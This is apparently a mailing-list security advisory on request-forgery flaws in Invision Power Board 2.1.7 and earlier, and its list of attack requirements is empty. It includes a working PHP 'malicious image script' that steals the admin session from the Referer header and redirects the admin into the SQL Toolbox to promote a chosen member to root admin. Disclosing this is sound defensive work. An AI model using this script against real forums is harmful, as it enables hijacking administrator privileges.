Invision Power Board Multiple Vulnerabilities
Affects: IPB <=2.1.7
Risk: High
An attack exists where an admin can be redirected and
forced to execute SQL commands through IPB's SQL
Toolbox.
The following requirements must be met for this attack
to take place:
This attack works invisibly to the admin because only
the image is redirected, not the page.
1st method:
In this method, any user can force the admin to
execute SQL commands.
2nd method:
A restricted admin can add any HTML to a forum's
description(including javascript).
Example malicious image script:
<?php
//The member id to promote to root admin
$mid = 145;
//The database prefix (usually "ibf_")
$prefix = "ibf_";
if (preg_match('/(.*adsess=[\\w]{32})/',
$_SERVER['HTTP_REFERER'], $admin_loc) and $mid)
{
header("Location:
".$admin_loc[1]."&act=sql&code=runsql&query=UPDATE+{$prefix}members+SET+mgroup%3D4+where+id%3D{$mid}+LIMIT+1");
}
?>
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com